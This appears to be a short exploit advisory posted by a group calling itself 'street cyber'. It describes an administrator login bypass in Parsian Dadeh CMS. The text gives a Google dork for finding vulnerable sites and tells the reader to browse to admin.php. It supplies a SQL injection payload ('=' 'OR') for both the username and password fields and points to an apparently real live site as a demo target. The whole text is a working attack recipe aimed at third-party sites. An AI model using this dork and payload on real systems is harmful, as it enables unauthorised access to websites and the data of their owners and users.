Kod:
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|------------------------------------------------------------------[+]
|[+] Exploit Title: Parsian Dadeh CMS Admin Page Bypass
|[+]
|[+] Exploit Author : street cyber
|[+]
|[+] Google Dork: intext:"Designed and Developed By Parsian Dadeh"
|[+]
|[+] Tested on: Windows 7
|[+]
|[+] Date : 2016/07/11
|------------------------------------------------------------------[+]
|[+]
|[+] Vulnerable File : index.php
|[+] Describe : Search dork and select Target. Put admin.php After url such as :
|[+] http://site.com/admin/index.php
|[+] Now enter fill Gebruikersnaam(username) and Wachtwoord(Password) like the information below :
|[+] Username: '=' 'OR'
|[+] Password: '=' 'OR'
|[+]
|[+] OK :)
|[+]
|[+] Demo :
|[+] http://bdb.ir/admin.php
|[+]
|[+]
|----------------------------------------------------[+]
|[+] discovered by :
|[+] Sir_Mamad_Danger
|[+]
|[+] My friends :
|[+] 1- Ki@n error
|[+] and all street cyber members ...
|[+]--------------------------------------------[+]
|[+] Homepage :
|[+] http://streetcyber.com
|[+]-------------------------------------------[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|